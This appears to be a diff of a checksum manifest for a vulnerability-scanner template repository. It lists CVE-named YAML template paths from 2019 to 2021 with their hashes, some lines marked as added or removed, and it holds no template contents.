+http/cves/2019/CVE-2019-7543.yaml:22fef7d1b09c8a870ed5aa582f6a63da1b803284 +http/cves/2019/CVE-2019-7609.yaml:4d4a45b83f0b9846ae63264055d3654f1d46cca0 +http/cves/2019/CVE-2019-8086.yaml:1f824675a221171b98ee9963bfff2d956a35a24d +http/cves/2019/CVE-2019-8390.yaml:3956a0d2abd804ae8dfa1d957c1a75d90d1cc53d +http/cves/2019/CVE-2019-8442.yaml:175d71f5c319329fca33e64627e49f7d91624995 +http/cves/2019/CVE-2019-8446.yaml:e92506579f3e30ff768f50fda945ddffa7e985c2 +http/cves/2019/CVE-2019-8449.yaml:29347d464a7ae187362323251c2d3103eeb28426 +http/cves/2019/CVE-2019-8451.yaml:289b07e213f27ddafe93ba6d532e2b2a414c27e4 +http/cves/2019/CVE-2019-8903.yaml:38bca1c68339f3b55c026f60af43a2a6ce559e5d +http/cves/2019/CVE-2019-8937.yaml:7fbfc0e9c7315950605937f23c42251b343c9ffc +http/cves/2019/CVE-2019-8982.yaml:7c7c7b78c5f8f3fb9e69fc932fe87a011da25aa9 +http/cves/2019/CVE-2019-9041.yaml:2265fe409ad5f218b2a24f035a1784ea2ba819f1 +http/cves/2019/CVE-2019-9618.yaml:6624c8025fe84e952bbc9307824c85fd8aab4816 +http/cves/2019/CVE-2019-9670.yaml:358d5bfad6264d4846b24864ac496a0f567d172c +http/cves/2019/CVE-2019-9726.yaml:339c347eaa831e1a19a23248c28f93e37c5e9d62 +http/cves/2019/CVE-2019-9733.yaml:00d7bff0699993662060543c126ca1b0aa499c8a +http/cves/2019/CVE-2019-9915.yaml:fb83daf64948fc323360267efd07566df5ad92dc +http/cves/2019/CVE-2019-9922.yaml:8d8f682bc69d2e5a248ff72a0d8bd8a3b3e4d1cb +http/cves/2019/CVE-2019-9955.yaml:f9989889aa0a76adfae282464461a064803c2fe8 +http/cves/2019/CVE-2019-9978.yaml:abfe4699fd10f52dc3d96ad2678c758a803e6df6 +http/cves/2020/CVE-2020-0618.yaml:f606971d91cdde5213812cf454e44ead6c66ff05 +http/cves/2020/CVE-2020-10148.yaml:d0f98004b5f1ac9c69bb8ce1efaf28be82206075 +http/cves/2020/CVE-2020-10199.yaml:fa573df10826ec3e2c7041db0ef791110c3dc99c http/cves/2020/CVE-2020-10220.yaml:d4198c17d90c22e291f9ffcf41aa5838efcb3b70 -http/cves/2020/CVE-2020-10546.yaml:064a059d47a385fd83a9b1b62793b5891e9e5b07 -http/cves/2020/CVE-2020-10547.yaml:58b39f2460d859c96b62ab0697151b9d6334808e -http/cves/2020/CVE-2020-10548.yaml:379ae6d4c78187bc1e20dcf6ec9fb27ede275db3 -http/cves/2020/CVE-2020-10549.yaml:0f9961758b2f6c7c962853929563796bd7f64342 -http/cves/2020/CVE-2020-10770.yaml:0db36c2edbed1a1bed9c12adde6824129a2c96f7 -http/cves/2020/CVE-2020-10973.yaml:53145b79ec0ab6504b8fc498457a484384fdc299 -http/cves/2020/CVE-2020-11034.yaml:4c74a61ce4cfc15e2aa2b2bd50993bcedca2215d -http/cves/2020/CVE-2020-11110.yaml:3d311a1602b982d4000c2039bd1d1dd77045e455 -http/cves/2020/CVE-2020-11450.yaml:d5108f039fc6c7a5311663ea79fecb69d28bc33c -http/cves/2020/CVE-2020-11455.yaml:7e41705a11e9af5837934da8e7673800297f0550 -http/cves/2020/CVE-2020-11529.yaml:f081fe455cea5b07932e2c0df4c4e4a8be0c15bf -http/cves/2020/CVE-2020-11530.yaml:e089c180ab7bb5e83604b4ac9e1b645b2be2b03b -http/cves/2020/CVE-2020-11546.yaml:26335516739f6ca74fc3b9424bd18d4ae8e7c750 -http/cves/2020/CVE-2020-11547.yaml:3b1b8a9cbb153d5fcfd2fe4842c0a8cb2d483242 -http/cves/2020/CVE-2020-11710.yaml:8008bead95b73a192bc0b48e0d185137126ece78 -http/cves/2020/CVE-2020-11738.yaml:30102defa92f358c5c4acc9ed0c661b80d7bcbb1 -http/cves/2020/CVE-2020-11798.yaml:f79bee77a07bfac8eb5d13c4f8ee877fe3e226b7 -http/cves/2020/CVE-2020-11853.yaml:408bb4c9423a4f7f693db6042cc7e3d519234b4b -http/cves/2020/CVE-2020-11854.yaml:bd09db6d1e817ea67112fb672d106ec724ccee81 -http/cves/2020/CVE-2020-11930.yaml:781fbc21a27c44b791f1658519f0dc85f95134b3 -http/cves/2020/CVE-2020-11978.yaml:e30e76142a0af35ccc148caa9f9205fcb599b109 -http/cves/2020/CVE-2020-11991.yaml:3ab3efd84835d8a4c02cdc6a28c2c040985bc37e -http/cves/2020/CVE-2020-12054.yaml:30159bc1e0ff11ba1e222c556d1fc60ad130b011 -http/cves/2020/CVE-2020-12116.yaml:f6202591b92291acc54642d2b0a41c51b8f6f5ed -http/cves/2020/CVE-2020-12127.yaml:218d1ffbbd7f95a9f7b433526add2cf129d0e878 -http/cves/2020/CVE-2020-12447.yaml:6bb2f96967ccf61640eeeb7e2cec76e21a8c4cb1 -http/cves/2020/CVE-2020-12478.yaml:ac3c7bcc51ab26f7ecc54511266cbe763ff3a4bb -http/cves/2020/CVE-2020-12720.yaml:3016240d6710f74ac6941c8f22e68736fa8f166f -http/cves/2020/CVE-2020-12800.yaml:d35a2c2a8ba9835c1dd87e1b0b31f1168cd078e4 -http/cves/2020/CVE-2020-13117.yaml:d574cedc851d3980c625005181d86a0e469366de -http/cves/2020/CVE-2020-13121.yaml:9dc7b16d238c0f459e1c859af2eee995a490a654 -http/cves/2020/CVE-2020-13158.yaml:f62235f5a3b204038b3da15490ab9114643183b8 -http/cves/2020/CVE-2020-13167.yaml:65c3c0a11291c74e4ccb4e0b79ed0957d0a8de7c -http/cves/2020/CVE-2020-13258.yaml:aa3db4375fb4584fac99169f08ac1cda299855f3 -http/cves/2020/CVE-2020-13379.yaml:05f9450e2fd21df27c555b164451a4c25a308a68 -http/cves/2020/CVE-2020-13405.yaml:364c8a655d463164f79a3da5c045565d4fa9ff57 -http/cves/2020/CVE-2020-13483.yaml:34af617d306d7bf273b42a8056f5025cd910a442 -http/cves/2020/CVE-2020-13700.yaml:1a7bc8e4b8c9e42c098330b55f7f2365e48c71ca -http/cves/2020/CVE-2020-13820.yaml:b677794d277514a32f27886a0aa32db99a079672 -http/cves/2020/CVE-2020-13927.yaml:9812ce2e55a80542c369ed66ea73369507451e02 -http/cves/2020/CVE-2020-13937.yaml:036c3b60dc087cf0622105eab6a0964523b215fe -http/cves/2020/CVE-2020-13942.yaml:930ef513ee8a6cf81b6e1fa5f75503b4c0e27460 -http/cves/2020/CVE-2020-13945.yaml:a1e855ed71e92094ec51ecdc9be06545beb6b97d -http/cves/2020/CVE-2020-14092.yaml:59fc96a25eb17da290a7eb7627d01b03d33d5fa8 -http/cves/2020/CVE-2020-14144.yaml:938d16fed8e035bcd738482a06b625809a303d09 -http/cves/2020/CVE-2020-14179.yaml:e115b580e95d41a9f14b51df857382b1b1c9abc5 -http/cves/2020/CVE-2020-14181.yaml:c0f088aa7e0742bc3458a88116e88238ea73e3e7 -http/cves/2020/CVE-2020-14408.yaml:d3ffcb9ed24b6ea079fdb766dff445ad79062c27 -http/cves/2020/CVE-2020-14413.yaml:f12ded9d968480f57f6f09f3e2a31f7834f3d6c2 -http/cves/2020/CVE-2020-14750.yaml:a7c6c48358f548398fa4013fa3529f706d138ae1 -http/cves/2020/CVE-2020-14864.yaml:5e9cee5700e170ff04fbdeac2632e30a532eea43 -http/cves/2020/CVE-2020-14882.yaml:3bb7e608e8fffa38f6d2a864688f6e9fb0b5495a -http/cves/2020/CVE-2020-14883.yaml:732fc6e1a62345c19a7d2e7c656a093c25f5219a -http/cves/2020/CVE-2020-15050.yaml:593f2db51d5aaeafd696a2ab6e6c7f1872f4027e -http/cves/2020/CVE-2020-15129.yaml:d18a3687a4cba0e6459c3ed2bc09bed8f0076489 -http/cves/2020/CVE-2020-15148.yaml:a724c9bf38b480aa111a0859b9168fdf2c2aacf5 -http/cves/2020/CVE-2020-15227.yaml:57e451636e805716c5c15cc23d888bb9032d267d -http/cves/2020/CVE-2020-15500.yaml:f64bd4166f8ccbb587aa3bc2fa55b4e5e1763ac2 -http/cves/2020/CVE-2020-15505.yaml:7d9d0cd336dbe0271a873b29a3139cba2c9d2a3b -http/cves/2020/CVE-2020-15568.yaml:8d55144e36babbf7a7de5bc51fab5f3e8a8de9c3 -http/cves/2020/CVE-2020-15867.yaml:14b41a94084e97e52d5d41e468c66fa18113c151 -http/cves/2020/CVE-2020-15895.yaml:9a0290c91439daa4d218bf11f8647e98eb9360c1 -http/cves/2020/CVE-2020-15920.yaml:55986fe8b8bb1c884cb53d4a7952055785c07b8d -http/cves/2020/CVE-2020-16139.yaml:27fa7b975e404277722ec36a91b3e70324cd87b8 -http/cves/2020/CVE-2020-16846.yaml:b55df4d8c53f4b44d247ac71cf8ff325ace7dc5d -http/cves/2020/CVE-2020-16952.yaml:60c1366d87b6641f9269c9ca981fccc1a0a1ee36 -http/cves/2020/CVE-2020-17362.yaml:6233b82d85270076f5c3584cf70bc2444d3724b4 -http/cves/2020/CVE-2020-17453.yaml:a3502c04cdc66cf2d6620720aaf4fb43b4a5d7ea -http/cves/2020/CVE-2020-17456.yaml:7b5d5562b2ee0010e5a266f18d5ca434011eb300 -http/cves/2020/CVE-2020-17463.yaml:9128c9e899af060b3c36ffa2c41690fe88cfccc2 -http/cves/2020/CVE-2020-17496.yaml:394db0bbf8b774f86ef32ee53cf02e62f5cc72ad -http/cves/2020/CVE-2020-17505.yaml:15057959cd0b79fbd8bba9649f2f9433550d3fc3 -http/cves/2020/CVE-2020-17506.yaml:27001466bad9424476352809a6ad50d4b49b0ba9 -http/cves/2020/CVE-2020-17518.yaml:10e7dd7cb2274d2d1a496f2ffba7746919589d86 -http/cves/2020/CVE-2020-17519.yaml:5f430125e9d7ef9d9baa146499f85ee91afde363 -http/cves/2020/CVE-2020-17526.yaml:619a26a64cad39d6e2ae7c7c2e46e6d178e5432d -http/cves/2020/CVE-2020-17530.yaml:b352b6e782be932f802fe84fcaa49690ac30af30 -http/cves/2020/CVE-2020-18268.yaml:c4ae030e7bb6de9af1f129f900cf8aebb9ac1219 -http/cves/2020/CVE-2020-19282.yaml:3b7735d9f66c74880e0004001b31f7468a5c2f60 -http/cves/2020/CVE-2020-19283.yaml:7818ad3f258d7e59d5d456e12d8917bce777148a -http/cves/2020/CVE-2020-19295.yaml:1822a8079f2888635171d9859dbcfcb0c4206b07 -http/cves/2020/CVE-2020-19360.yaml:c2d091d1932054368c2c90545902430204f64acd -http/cves/2020/CVE-2020-1943.yaml:fb0a5f01a942c61cfaf319cd619a25252d3567bf -http/cves/2020/CVE-2020-19515.yaml:279acecfcd6a99c74ba053dfb0eeadedc72a36cb -http/cves/2020/CVE-2020-1956.yaml:6cb75e7dbbba85bb7298356cee29c0290a06b7ec -http/cves/2020/CVE-2020-19625.yaml:8236b0969dd41cc1c707357580005618454339b0 -http/cves/2020/CVE-2020-20285.yaml:dc890012c94219bf97541a1c58e454001a48d4e9 -http/cves/2020/CVE-2020-20300.yaml:d3e5b62d095b34de75428b9cf5c60a1a014edc6f -http/cves/2020/CVE-2020-2036.yaml:e45084ba885a384a95bcb97336b2fdaa8331fac9 -http/cves/2020/CVE-2020-2096.yaml:f32397f65123dba57d80c1170cdae16e45829d01 -http/cves/2020/CVE-2020-20982.yaml:555e3cc76b0d29061cb66bcdfe145198d647dc38 -http/cves/2020/CVE-2020-20988.yaml:0f0da0a731c292d923877b4fc1c41d251fa861b0 -http/cves/2020/CVE-2020-21012.yaml:a6b3ca51a6b6eb708ed9047e12715980d9938f25 -http/cves/2020/CVE-2020-2103.yaml:6a645d653bb3329afb046cb7a51d4bc058f520ec -http/cves/2020/CVE-2020-21224.yaml:e6a44e7fe72a18b57b77dca4e9b6a0904925a60e -http/cves/2020/CVE-2020-2140.yaml:bce593919b6dab7878b77a41cee8e368c3fe57b8 -http/cves/2020/CVE-2020-22208.yaml:2a4d05a5b0cd42218f82f9ce281d99c538b2d79a -http/cves/2020/CVE-2020-22209.yaml:d8c87971dbfdc7dfcf7db3737e70bc515582600c -http/cves/2020/CVE-2020-22210.yaml:8ef0973193dc68c8857befe4a8a7c08c1de7d58b -http/cves/2020/CVE-2020-22211.yaml:f0ec5b706bca7478a713754d6431042709144e89 -http/cves/2020/CVE-2020-22840.yaml:e569206bb9e930c9a05f61f012b10d63883baab1 -http/cves/2020/CVE-2020-23015.yaml:5966900611f9d327deaead3b708f5509ec136553 -http/cves/2020/CVE-2020-23517.yaml:6367c1ae2d248af062e4968dbbb757dba726eedf -http/cves/2020/CVE-2020-23575.yaml:b4a6b1b877da21ba2de6586cf574aaba1eefd2b1 -http/cves/2020/CVE-2020-23697.yaml:85be72198d7870d49990a0245f884982f1b1103b -http/cves/2020/CVE-2020-23972.yaml:7bc789cf93d59f1406fb0852a1c5332eb7974c17 -http/cves/2020/CVE-2020-24148.yaml:7527d0a9b9e6eaae22490b6c288db7a4f6b44382 -http/cves/2020/CVE-2020-24186.yaml:e38aba90b7c6798e224d41a04cff619a6375a589 -http/cves/2020/CVE-2020-24223.yaml:2012ec05fb374ac43d53a97a824ba3c6bd3774c5 -http/cves/2020/CVE-2020-24312.yaml:32af1bad0ae2714f01ce93aacc4264ded758ce58 -http/cves/2020/CVE-2020-24391.yaml:5a9dfc68b1de0bc196497547a210a58192c792df -http/cves/2020/CVE-2020-24550.yaml:8b60fa502501f840fbe3980ddc3f3824b21770ae -http/cves/2020/CVE-2020-24571.yaml:a5aae4919724671117871da62ad8250a5150464c -http/cves/2020/CVE-2020-24579.yaml:b9c0f74be04981a0432e2492f1984201b26acd7a -http/cves/2020/CVE-2020-24589.yaml:cc967d60b423598b1f63a24e78c174d9baf2bcf5 -http/cves/2020/CVE-2020-24902.yaml:59dc4242feaca98d1864ca13092e0325cbfc6925 -http/cves/2020/CVE-2020-24903.yaml:b6de55025f8dc60c7e2010a6049e9a52d6a6026a -http/cves/2020/CVE-2020-24912.yaml:c26bf8e881b31991d66335cb24f07a910ecb5cee -http/cves/2020/CVE-2020-24949.yaml:a020521fee3def3deeb0cdee19651cacfd2671bf -http/cves/2020/CVE-2020-25078.yaml:4256d907880f18d8786a7fde2a6118b64fe10610 -http/cves/2020/CVE-2020-25213.yaml:51a2bda9757ca2aaf450efa4fd601cb105bc03ed -http/cves/2020/CVE-2020-25223.yaml:4b2402c536dc24c89c78c572f331e7364e74d078 -http/cves/2020/CVE-2020-25495.yaml:ddb76a6d5e15cf7077b515e7ed675661169f64ca -http/cves/2020/CVE-2020-25506.yaml:c5bc255a9b599b4f8767d6cbb393c974149d7277 -http/cves/2020/CVE-2020-2551.yaml:a170377fb9b37e4e0e8b3d0367c11f83519ac185 -http/cves/2020/CVE-2020-25540.yaml:30e0b74b5b51b46e701b323f880ce00008fa18e4 -http/cves/2020/CVE-2020-25780.yaml:7c6f8948a49f46a61f1c4bccf80bef8715be701b -http/cves/2020/CVE-2020-25864.yaml:df72e97557808a87972ee176e781e748bce43780 -http/cves/2020/CVE-2020-26073.yaml:da7e71ae9e9edf821e065ba7e37d5639f9a6945c -http/cves/2020/CVE-2020-26153.yaml:5b8971e307bbba7b8c234e33a6f9e35508724b41 -http/cves/2020/CVE-2020-26214.yaml:114586c7c035c2046429fb53d70c0079de2ec773 -http/cves/2020/CVE-2020-26217.yaml:76ee44f4a3bfe8a13bb656728fe284d8bb8b7f5a -http/cves/2020/CVE-2020-26248.yaml:2d52ab4612cd291ef913fb1a0126d0a1c2378456 -http/cves/2020/CVE-2020-26258.yaml:d242e5e0d3ea2eb8af2c082a18339dde5511d707 -http/cves/2020/CVE-2020-26413.yaml:d55d247ecbd37276cec172bb221b7ab99c71a315 -http/cves/2020/CVE-2020-26876.yaml:8765cb9de85ca96f18b333382ec764038f14c1ef -http/cves/2020/CVE-2020-26919.yaml:f3e3a0171641dcee2d597cc675b65f6bfc8d68ac -http/cves/2020/CVE-2020-26948.yaml:ec37ce80c844d3c541e1cdc43a4e7f258be01d84 -http/cves/2020/CVE-2020-27191.yaml:3ef96b680ff7974f1b50ff1ce921202f1a79e253 -http/cves/2020/CVE-2020-2733.yaml:2ab5fe1c642af840820d418a47038947a36dd585 -http/cves/2020/CVE-2020-27361.yaml:269312106920c0f5cc1984f3ed253f22f75e2cd8 -http/cves/2020/CVE-2020-27467.yaml:e6f04dd69ea62cd7e4a5e88aa247eb34fcc3e632 -http/cves/2020/CVE-2020-27481.yaml:43db7cd5e27c8f1ba73802ca990af57261c795ac -http/cves/2020/CVE-2020-27735.yaml:595155049710d505abb41ae2892b36ebeb0fb778 -http/cves/2020/CVE-2020-27866.yaml:80efee5ba0f7cb5b1f199af3af851a5d0ccd4d61 -http/cves/2020/CVE-2020-27982.yaml:254ff77ecf1a6978a0d8463d001ca2ee2863e16e -http/cves/2020/CVE-2020-27986.yaml:4cc1489b4b379bb337fb826052657eac4503742d -http/cves/2020/CVE-2020-28185.yaml:262c94e37d68db1636f3b65ba84fbadbf3090a8f -http/cves/2020/CVE-2020-28188.yaml:0536db07b0558ec184da04ef1881554f64c7895b -http/cves/2020/CVE-2020-28208.yaml:38991304808157d0ee30a9eaf4ea9b5eb54bce81 -http/cves/2020/CVE-2020-28351.yaml:2f82d2d1ae412ec1c5211c59527d82207211508e -http/cves/2020/CVE-2020-28871.yaml:6e8dcc2115b035d2505de799280125bccf6329ac -http/cves/2020/CVE-2020-28976.yaml:8978b171e9539cd458878fbe147bb6dbd34ac89d -http/cves/2020/CVE-2020-29164.yaml:33e3268ebb21c86d4ab24d246cae9011bc585eab -http/cves/2020/CVE-2020-29227.yaml:79140b3ef3400cd2bd112f454b0464f9d68316a7 -http/cves/2020/CVE-2020-29284.yaml:48865c4b15658a35ac7df2d052adfbb006dfe16a -http/cves/2020/CVE-2020-29395.yaml:e2f99243efe66c7c15d79883734245319673c547 -http/cves/2020/CVE-2020-29453.yaml:d910eedc1301b77bf17b1de96fee2de074ff35c5 -http/cves/2020/CVE-2020-29583.yaml:eb52cf9cf7b7a0166974ac6bcb534827e4dfcdd6 -http/cves/2020/CVE-2020-29597.yaml:a409e666cfb82dc2db3f04413a275afe98ae4490 -http/cves/2020/CVE-2020-3187.yaml:f8d364046af9b91daa42ccfdc963cb665c4c35e0 -http/cves/2020/CVE-2020-3452.yaml:d10d877a6d3b27afbb978e76914c4aace0f0091b -http/cves/2020/CVE-2020-35234.yaml:62f56983c8e402489c1569cfef5637fd1ad996c9 -http/cves/2020/CVE-2020-35338.yaml:9fa716b20898dc2c7921098f72774788d5646d23 -http/cves/2020/CVE-2020-35476.yaml:ea2cb0452d987a6e57eba91b7ea008075926171f -http/cves/2020/CVE-2020-35489.yaml:4e79ee87735f0cf277b113eb1de44bcf0caba8ac -http/cves/2020/CVE-2020-35580.yaml:1a170fe69e135268cace11753df1203b7b27c4f9 -http/cves/2020/CVE-2020-35598.yaml:06b0481661acd11cd9b4c76b38700e0ec30602f5 -http/cves/2020/CVE-2020-35713.yaml:188c972adf219e1ddfc22ea177becf466cfe4c4f -http/cves/2020/CVE-2020-35729.yaml:f44be4fb626f88253d831f446ea4fae65d178058 -http/cves/2020/CVE-2020-35736.yaml:78669570d10ba3fb76c610a2346debc3e9c005d8 -http/cves/2020/CVE-2020-35749.yaml:3f538caa7cba59b8ceaeaae175d1776782f0b8d8 -http/cves/2020/CVE-2020-35774.yaml:ffbc92d01fd9f5940f2ed83dfe3a15d3539816ab -http/cves/2020/CVE-2020-3580.yaml:ad7695b29c8601ac4bec198ff490791e456089eb -http/cves/2020/CVE-2020-35846.yaml:463a6816239150352e33855f3924149af68d75df -http/cves/2020/CVE-2020-35847.yaml:a8765395998bb7ac74808e562f4cdc6987bbb5e1 -http/cves/2020/CVE-2020-35848.yaml:4659cfdaa7d74b49c69b775b0604b7abbaa483e8 -http/cves/2020/CVE-2020-35951.yaml:f812038ecef7db798460a5023a215b07f220afc0 -http/cves/2020/CVE-2020-35984.yaml:fbf47b5b75947541b94c99625f4b777bd62dede2 -http/cves/2020/CVE-2020-35985.yaml:2b95de11da11389908f337abcb10e3ccbcc25a62 -http/cves/2020/CVE-2020-35986.yaml:e980e46cb4feaaddb6ba715df637a40c71c88b2f -http/cves/2020/CVE-2020-35987.yaml:2ff076e4b0c878b8bb07029c4306f5843ba109dc -http/cves/2020/CVE-2020-36112.yaml:a91a821464ee429d41a4239b6a294d29eb2dcf74 -http/cves/2020/CVE-2020-36289.yaml:28b8419fb07699288bdc38b729f22f32843ee3fc -http/cves/2020/CVE-2020-36365.yaml:fd06055661267f4e85095deea1f5301a335aa42c -http/cves/2020/CVE-2020-36510.yaml:1ff5f25dda7bccdb06e6126e743dd19a3cb54782 -http/cves/2020/CVE-2020-4463.yaml:e27babd7fb418adfec6066d7c08bdf5dc24866dd -http/cves/2020/CVE-2020-5191.yaml:ea1ad60c79ddd77b6bfe5bbf5501c1e67145eae8 -http/cves/2020/CVE-2020-5192.yaml:6143f83a4a72d0571cbca8662b779cc1b0dabf4a -http/cves/2020/CVE-2020-5284.yaml:ef5b4357c3cc440a10e4a3b0b63b9805fb893e8a -http/cves/2020/CVE-2020-5307.yaml:c999e7e0b81b2c57b721927f884c828cde10e80d -http/cves/2020/CVE-2020-5405.yaml:47fe5058304aea4ddb5580b78a17631b8caf04ea -http/cves/2020/CVE-2020-5410.yaml:bd7392f4e6d9e72ea92d1d4583109f16a544efbf -http/cves/2020/CVE-2020-5412.yaml:14f8d8422e3517698ac4339bec980c622520aa12 -http/cves/2020/CVE-2020-5775.yaml:b4cdc4b729468b960d5b19baa0c7e832bfce2979 -http/cves/2020/CVE-2020-5776.yaml:420442615a8af894369098538fccff10b95aa9d7 -http/cves/2020/CVE-2020-5777.yaml:7dc52fbcea5b72fdcf5cc24820e658a659b4fea6 -http/cves/2020/CVE-2020-5847.yaml:9024ba8897aaccdfab11289d323ea27d033d9a8a -http/cves/2020/CVE-2020-5902.yaml:62a903cd934cae7ff9c50371713461157fb279ea -http/cves/2020/CVE-2020-6171.yaml:336d8ff72a19716e5fb2495c66cafc9f60150d5d -http/cves/2020/CVE-2020-6207.yaml:9b2242778cba95bf625e3f85f5707aed8d0ffdf0 -http/cves/2020/CVE-2020-6287.yaml:f5315c5431508ecc34b65f4cf6ee214c8bddd190 -http/cves/2020/CVE-2020-6308.yaml:e032eacee2459683683ab23db9e35dbed6c78fd7 -http/cves/2020/CVE-2020-6637.yaml:8b2e7416d9ab2e81e24848ac0aa88984a5e79aaf -http/cves/2020/CVE-2020-7107.yaml:509d5c3de1447a79d4b10d172169e2b4b0699b04 -http/cves/2020/CVE-2020-7136.yaml:53676124086a4e7184a8928310dc15f08651ef05 -http/cves/2020/CVE-2020-7209.yaml:965eb4a633e79a9c5b008312ddb6e1f0ba04b74c -http/cves/2020/CVE-2020-7318.yaml:ef56bc4173bfe3c5712d56ae170dcf77a9b422b5 -http/cves/2020/CVE-2020-7796.yaml:db448f91970125711325319e1dac58d6642fc6c4 -http/cves/2020/CVE-2020-7943.yaml:f22fb5d90a692320bc38a5668f7c0ab4668f727b -http/cves/2020/CVE-2020-7961.yaml:5a8c556128cf3a20c62a77f72eead149ef17ff37 -http/cves/2020/CVE-2020-7980.yaml:112a3ba88b84639b0d1f97df7ba1e681a9260432 -http/cves/2020/CVE-2020-8115.yaml:a13f99f4d559b4750e423bf8db7cf5b61f516c49 -http/cves/2020/CVE-2020-8163.yaml:23d07b07b0f815a7ab7ca53c0b1d915334ab242a -http/cves/2020/CVE-2020-8191.yaml:2e7d80f8da5685e146fbf2a81b7c12ca42c39161 -http/cves/2020/CVE-2020-8193.yaml:5480d81022b07ed180ba287b2ff977d3939abac5 -http/cves/2020/CVE-2020-8194.yaml:f38c1c7e9e666b2d1df8b1cfd77140bbd3c84572 -http/cves/2020/CVE-2020-8209.yaml:df2a77d82d2306d67f2302922bac8fdae9e0cb3e -http/cves/2020/CVE-2020-8497.yaml:94739203b6685bea3f74da746f3423c16c793fc0 -http/cves/2020/CVE-2020-8512.yaml:036432d0b381cf91ba6220344bddb6f8d6da2ecf -http/cves/2020/CVE-2020-8515.yaml:2211cfe8e218c1bc59c88c216698ce948c7bf06c -http/cves/2020/CVE-2020-8641.yaml:6cae92bebe6c59ea54851ad4b9648f92c0b9d562 -http/cves/2020/CVE-2020-8644.yaml:4e439b2994086c00af8ba77d2271ff5e855154b6 -http/cves/2020/CVE-2020-8654.yaml:781056b0a41d3cd278fa453b31ef957e6bdfab40 -http/cves/2020/CVE-2020-8771.yaml:fb115a3ac38ff9383d7b42cf68cdfdc9240a9bb3 -http/cves/2020/CVE-2020-8772.yaml:cd15694583cf7ed61139f0dc45ec5422ee2eeec5 -http/cves/2020/CVE-2020-8813.yaml:7a97158682aec6ac5156b7bdc5bde4f803bc2b42 -http/cves/2020/CVE-2020-8982.yaml:827be7ef7c8d3d6a21936f8df17dfc1185e51964 -http/cves/2020/CVE-2020-9036.yaml:7f4b9768eaa54c82746d9637f5ab8555a402ea2f -http/cves/2020/CVE-2020-9043.yaml:57eac33ffa7b5a2d3dff0019544d3253137bbb2b -http/cves/2020/CVE-2020-9047.yaml:ed28a11ee167e23290964706591839b020b60804 -http/cves/2020/CVE-2020-9054.yaml:8fdeaa555ec7803187487deca0fd47faafa69a27 -http/cves/2020/CVE-2020-9315.yaml:4ab95131297f03b71f392f1f7e165405c35da213 -http/cves/2020/CVE-2020-9344.yaml:e59de67f4147327b23bc8dbb24b60862ebdb5ea1 -http/cves/2020/CVE-2020-9376.yaml:0f7bdaf3d1e059f773bd3ffaf25afb69cd9087f0 -http/cves/2020/CVE-2020-9402.yaml:c6d54a7865f26faeab670a26c89464d137c9cd56 -http/cves/2020/CVE-2020-9425.yaml:f31bf4dc9e034f0fb7f64ebae94c1efd292c02d8 -http/cves/2020/CVE-2020-9483.yaml:6182868c496eece52e711d16ec7cb5b869e35a9c -http/cves/2020/CVE-2020-9484.yaml:f70b0a8fa17578225c5c9e994c5f699d67f03326 -http/cves/2020/CVE-2020-9496.yaml:7a99fcbd0224749f815f75cb398b03c484712bbd -http/cves/2020/CVE-2020-9757.yaml:fd4c4cc4f490aac17f965612e1020b3c604140b4 -http/cves/2021/CVE-2021-1472.yaml:700fe81b6a8651953913ace41f0af648b74092e3 -http/cves/2021/CVE-2021-1497.yaml:943d0a9e1ab034c14e7fe07d71fba6fac96fc7eb -http/cves/2021/CVE-2021-1498.yaml:17b254be50286e81d2ec91fa9b26adcda36ec9e1 -http/cves/2021/CVE-2021-1499.yaml:2d7ac2ba91d257b08ee5fd456b22804718fa23bf -http/cves/2021/CVE-2021-20031.yaml:7ae902b592594c2e8459ae8437ec8bbf531a675d -http/cves/2021/CVE-2021-20038.yaml:e7878ab130181f6093bfd1a14776680c4aeb979c -http/cves/2021/CVE-2021-20090.yaml:9202b02cebcd713a18489954f9328b61f183527b -http/cves/2021/CVE-2021-20091.yaml:98ed1cb4452d5de9042aaa090ca757cbcc9303a9 -http/cves/2021/CVE-2021-20092.yaml:9a4928708649212e29c5db49ed8ba314c71d6313 -http/cves/2021/CVE-2021-20114.yaml:a11e8785e77c5db5011b447418f7985f009406d7 -http/cves/2021/CVE-2021-20123.yaml:7022e2fb943e7214937860b8d0daf66ac4af10c3 -http/cves/2021/CVE-2021-20124.yaml:5980b7e5be2025e3362b311b3f2cb86dc236a632 -http/cves/2021/CVE-2021-20137.yaml:878b6518da2690401ff3287751d1ca86df27811f -http/cves/2021/CVE-2021-20150.yaml:863ff1e42b5374477da5e681a2be8e59a96962a8 -http/cves/2021/CVE-2021-20158.yaml:0e43f8a49912bc8c69a00cfbbe28558c22a601f0 -http/cves/2021/CVE-2021-20167.yaml:78ec7bf5f6399292f9bb1f98fe19810408148342 -http/cves/2021/CVE-2021-20323.yaml:e5721e9becd213d3dfaf4162b8b60c1a07bc371e -http/cves/2021/CVE-2021-20792.yaml:dd9ec44c0c4f39baeec41be8aedb9ad1c4987b33 -http/cves/2021/CVE-2021-20837.yaml:ec1b8ef5c7af2188bbe81e5cf737d1d72077dc32 -http/cves/2021/CVE-2021-21087.yaml:6bf351bbdc7a379fe07c243608a940c5ae646e45 -http/cves/2021/CVE-2021-21234.yaml:75441424981ca8d6490fcd19afa7273f4279fc2f -http/cves/2021/CVE-2021-21287.yaml:a022b4debe13408242e0bb0cff0105c9b787a298 -http/cves/2021/CVE-2021-21307.yaml:1cf6128664e16ddd4a7ecb9bff536873331c426b -http/cves/2021/CVE-2021-21311.yaml:0c6955bd6cb495bb6dabb9177600e793c43965f3 -http/cves/2021/CVE-2021-21315.yaml:7a14d0e80645afb5434c744345a997bf34880e16 -http/cves/2021/CVE-2021-21345.yaml:3e9f0a176051cf9172bfaf013f5d052d4f735c31 -http/cves/2021/CVE-2021-21351.yaml:77b692c398b3e5889f73aa5c5e590582b5e3db36 -http/cves/2021/CVE-2021-21389.yaml:fa6a2e438d85233d2d3488db26cb276994e3dbf0 -http/cves/2021/CVE-2021-21402.yaml:3585d5d14f65ff272ce5dbc40269551eda2a7bc8 -http/cves/2021/CVE-2021-21479.yaml:e5c925c042d5a4ed086828d9c3b6914a1f1f9972 -http/cves/2021/CVE-2021-21745.yaml:07e861e3daf2942df30152c7fcefde2e6ced330d -http/cves/2021/CVE-2021-21799.yaml:f573799300ad0c61651e743247fb6c22e9b422a0 -http/cves/2021/CVE-2021-21800.yaml:a4f0a61620b4fdbcb24801668d24e4874e028d5b -http/cves/2021/CVE-2021-21801.yaml:edac88933584a12f2e380a1523a4efab30f84c40 -http/cves/2021/CVE-2021-21802.yaml:28bbdc92fd0969e053b3c8fb9d02e1acc9dbdb82 